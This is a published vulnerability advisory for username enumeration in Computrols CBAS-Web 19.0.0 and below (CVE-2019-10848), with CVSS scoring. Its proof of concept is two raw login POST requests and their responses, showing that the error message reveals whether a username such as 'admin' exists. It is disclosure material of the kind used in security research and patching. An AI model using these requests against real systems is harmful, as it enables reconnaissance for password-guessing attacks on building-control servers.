Computrols CBAS-Web 19.0.0 Username Enumeration

Credit: LiquidWorm
Risk: Low
Local: No
Remote: Yes
CWE: CWE-200

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Computrols CBAS-Web Username Enumeration Affected versions: 19.0.0 and below CVE: CVE-2019-10848 Advisory: Paper: Discovered by Gjoko 'LiquidWorm' Krstic Testing for non-valid user: POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62 Response for non-valid user: <!-- Failed login comments appear here --> <p class="alert-error">randomuser</p> ======================================================================== Testing for valid user: POST /cbas/index.php?m=auth&a=login HTTP/1.1 username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s Response for valid user: <!-- Failed login comments appear here --> <p class="alert-error">Invalid username/password combination. Please try again!</p>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top